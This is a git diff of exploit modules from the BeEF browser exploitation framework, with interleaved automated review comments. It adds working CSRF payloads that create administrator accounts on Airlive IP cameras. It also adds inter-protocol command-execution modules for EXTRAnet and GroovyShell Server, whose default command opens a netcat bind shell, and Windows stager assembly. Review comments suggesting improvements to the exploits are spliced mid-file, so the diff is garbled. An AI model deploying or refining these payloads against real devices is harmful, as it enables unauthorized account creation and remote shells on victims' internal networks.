diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm
new file mode 100644
index 000000000..f12b2f17c
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: None
+; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
+; Clobbers: EAX, EBX, ECX, EDX
+
+ mov ebx,0x1000 ; setup our flags and buffer size in ebx
+allocate_memory: ; Alloc a buffer for the request and response data
+ push byte 0x40 ; PAGE_EXECUTE_READWRITE - don't need execute but may as well
+ push ebx ; MEM_COMMIT
+ push ebx ; size of memory to be allocated (4096 bytes)
+ push byte 0 ; NULL as we dont care where the allocation is
+ push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
+ call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
index 7e312ae66..6522246c0 100644
--- a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
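Review bot: The comment `PAGE_EXECUTE_READWRITE - don't need execute but may as well` is wrong for one of the two users of this block: block_beef_bind-stager.asm does `jmp esi` into this very buffer after recv, so execute is required there, while the stage only keeps request/response text in it. Say so, e.g. `; PAGE_EXECUTE_READWRITE - the stager executes the received stage from this buffer`, so nobody later "fixes" it to PAGE_READWRITE. The NULL return of VirtualAlloc is never checked; a `test eax, eax` with a bail-out path would stop the callers from receiving into address 0.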
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var base = '<%= @base %>'; var username = '<%= @username %>'; diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml index f754f84f7..099017ee8 100644 --- a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml +++ b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -22,4 +12,4 @@ beef: description: "Attempts to add a user to a boastMachine <= 3.1 install." authors: ["bcoles", "Dr.NaNo"] target: - working: ["ALL"] + unknown: ["ALL"] diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb index 0fcdc068b..317e22e7f 100644 --- a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb +++ b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Boastmachine_add_user_csrf < BeEF::Core::Command diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/command.js b/modules/exploits/camera/airlive_ip_camera_csrf/command.js new file mode 100644 index 000000000..b4bb27d9e --- /dev/null +++ b/modules/exploits/camera/airlive_ip_camera_csrf/command.js 
@@ -0,0 +1,30 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var base = '<%= @base %>'; + var path = 'cgi-bin/admin/usrgrp.cgi'; + var user = '<%= @user %>'; + var pass = '<%= @pass %>'; + + var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET", + [{'type':'hidden', 'name':'user', 'value':user}, + {'type':'hidden', 'name':'pwd', 'value':pass}, + {'type':'hidden', 'name':'grp', 'value':'administrator'}, + {'type':'hidden', 'name':'sgrp', 'value':'ptz'}, + {'type':'hidden', 'name':'action', 'value':'add'}, + {'type':'hidden', 'name':'redirect', 'value':''} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml b/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml new file mode 100644 index 000000000..05c6fd00a --- /dev/null +++ b/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# For more information see: +# http://www.exploit-db.com/exploits/26174/ +## +beef: + module: + airlive_add_user_csrf: + enable: true + category: ["Exploits", "Camera"] + name: "Airlive Add User CSRF" + description: "Attempts to add an admin user on a Airlive camera.
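Review bot: `cleanup = function() {...}` assigns an undeclared identifier, creating or overwriting the global `window.cleanup`, and `setTimeout("cleanup()", 15000)` then evaluates a string; if any other module in the hooked page uses the same pattern within 15 s, the wrong iframe is removed or `removeChild` throws. Pass the function directly and keep it local: `setTimeout(function() { document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>); }, 15000);`. The `result=exploit attempted` sent to the server only means the form was submitted - nothing in the iframe's response is readable cross-origin - so a one-line comment that the result is blind would stop an operator reading it as success. This pattern may be shared with other BeEF CSRF modules, in which case the same fix applies there.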

This CSRF is reported to work on the following models: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.

Note: This module has not been tested on a real device." + authors: ["bcoles", "Eliezer Varadé Lopez", "Javier Repiso Sánchez", "Jonás Ropero Castillo"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/module.rb b/modules/exploits/camera/airlive_ip_camera_csrf/module.rb new file mode 100644 index 000000000..22463ca92 --- /dev/null +++ b/modules/exploits/camera/airlive_ip_camera_csrf/module.rb @@ -0,0 +1,20 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Airlive_add_user_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'}, + {'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'}, + {'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/command.js b/modules/exploits/camera/dlink_dcs_series_csrf/command.js index 725d60c24..4cfa20e8c 100644 --- a/modules/exploits/camera/dlink_dcs_series_csrf/command.js +++ b/modules/exploits/camera/dlink_dcs_series_csrf/command.js 
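Review bot: The `base` option's label reads `Router web root` although this module targets an Airlive IP camera (the class is `Airlive_add_user_csrf` and the category is Camera); it looks copied from a router module. Change it to `'ui_label' => 'Camera web root'`. The default `http://192.168.0.1/` is unverified - the config notes the module was not tested on a real device - so a comment pointing at the exploit-db reference used for the request path and default address would help the next maintainer.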
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var base = '<%= @base %>';
 var passwd = '<%= @password %>';
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
index af3d4a3f0..78347560b 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # More info: http://www.exploit-db.com/exploits/18509/
 #
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
index 49ed6809f..5e56aaf61 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Dlink_dcs_series_csrf < BeEF::Core::Command
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
index 2271f1d33..700e09603 100644
--- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
+++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var gateway = '<%= @base %>';
 var path = 'adm/file.cgi';
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
index 2bc3a6bfc..84bb3bf33 100644
--- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
+++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
index ffa988308..ce946808e 100644
--- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
+++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command
diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/command.js b/modules/exploits/coldfusion_dir_traversal_exploit/command.js
index ec06b38d9..06062ca4a 100644
--- a/modules/exploits/coldfusion_dir_traversal_exploit/command.js
+++ b/modules/exploits/coldfusion_dir_traversal_exploit/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /**
 * ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor .
 * Inject into the vulnerable "locale" parameter the classic payload of a directory traversal.
diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml b/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
index e65daa2c1..0f6e856c6 100644
--- a/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
+++ b/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
index 21d58a474..d27fd77a9 100644
--- a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
+++ b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
diff --git a/modules/exploits/extract_cmd_exec/command.js b/modules/exploits/extract_cmd_exec/command.js
new file mode 100644
index 000000000..505b3656d
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var timeout = '<%= @timeout %>';
+
+ // validate payload
+ try {
+ var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+ var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
+ } catch(e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+ return;
+ }
+
+ // validate target details
+ if (!rport || !rhost || isNaN(rport)) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+ return;
+ }
+ if (rport > 65535 || rport < 0) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+ return;
+ }
+
+ // send commands
+ var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(extract_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/extract_cmd_exec/config.yaml b/modules/exploits/extract_cmd_exec/config.yaml
new file mode 100644
index 000000000..47de7283a
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ extract_cmd_exec:
+ enable: true
+ category: "Exploits"
+ name: "EXTRAnet Collaboration Tool (extra-ct) Command Execution"
+ description: "This module exploits a command execution vulnerability in the 'admserver' component of the EXTRAnet Collaboration Tool (default port 10100) to execute operating system commands.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF.

Note: Spaces in the command are not supported."
+ authors: ["bcoles"]
+ target:
+ working: ["FF", "C"]
+ not_working: ["IE"]
diff --git a/modules/exploits/extract_cmd_exec/module.rb b/modules/exploits/extract_cmd_exec/module.rb
new file mode 100644
index 000000000..0801fe20b
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/
+###
+# EXTRAnet Collaboration Tool (extra-ct)
+# Version: 0.5.1
+# Homepage: http://www.extra-ct.net/
+# Source: http://code.google.com/p/extra-ct/
+# Source: http://sourceforge.net/projects/extract/
+###
+class Extract_cmd_exec < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+ {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '10100'},
+ {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+ {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+ save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
+ end
+
+end
diff --git a/modules/exploits/glassfish_war_upload_xsrf/command.js b/modules/exploits/glassfish_war_upload_xsrf/command.js
index 9d681a207..9f1f3f0e0 100644
--- a/modules/exploits/glassfish_war_upload_xsrf/command.js
+++ b/modules/exploits/glassfish_war_upload_xsrf/command.js
@@ -1,19 +1,10 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com
 // For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html
diff --git a/modules/exploits/glassfish_war_upload_xsrf/config.yaml b/modules/exploits/glassfish_war_upload_xsrf/config.yaml
index 77572060e..4e34daee3 100644
--- a/modules/exploits/glassfish_war_upload_xsrf/config.yaml
+++ b/modules/exploits/glassfish_war_upload_xsrf/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/exploits/glassfish_war_upload_xsrf/module.rb b/modules/exploits/glassfish_war_upload_xsrf/module.rb
index a18ca8cd4..199208d23 100644
--- a/modules/exploits/glassfish_war_upload_xsrf/module.rb
+++ b/modules/exploits/glassfish_war_upload_xsrf/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Glassfish_war_upload_xsrf < BeEF::Core::Command
diff --git a/modules/exploits/groovyshell_server_cmd_exec/command.js b/modules/exploits/groovyshell_server_cmd_exec/command.js
new file mode 100644
index 000000000..8f4d5f146
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var timeout = '<%= @timeout %>';
+
+ // validate payload
+ try {
+ var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+ var payload = '\r\ndiscard\r\nprintln \''+cmd+'\'.execute().text\r\ngo\r\nexit\r\n'
+ } catch(e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+ return;
+ }
+
+ // validate target details
+ if (!rport || !rhost || isNaN(rport)) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+ return;
+ }
+ if (rport > 65535 || rport < 0) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+ return;
+ }
+
+ // send commands
+ var groovy_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(groovy_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/groovyshell_server_cmd_exec/config.yaml b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
new file mode 100644
index 000000000..8bb4a20b5
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ groovyshell_server_command_execution:
+ enable: true
+ category: "Exploits"
+ name: "GroovyShell Server Command Execution"
+ description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF.

Note: Spaces in the command are not supported."
+ authors: ["bcoles"]
+ target:
+ working: ["FF", "C"]
+ not_working: ["IE"]
diff --git a/modules/exploits/groovyshell_server_cmd_exec/module.rb b/modules/exploits/groovyshell_server_cmd_exec/module.rb
new file mode 100644
index 000000000..8f0526eb8
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Groovyshell_server_command_execution < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+ {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '6789'},
+ {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+ {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+ save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
+ end
+
+end
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/command.js b/modules/exploits/hp_ucmdb_add_user_csrf/command.js
new file mode 100644
index 000000000..cae83679b
--- /dev/null
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/command.js
@@ -0,0 +1,32 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
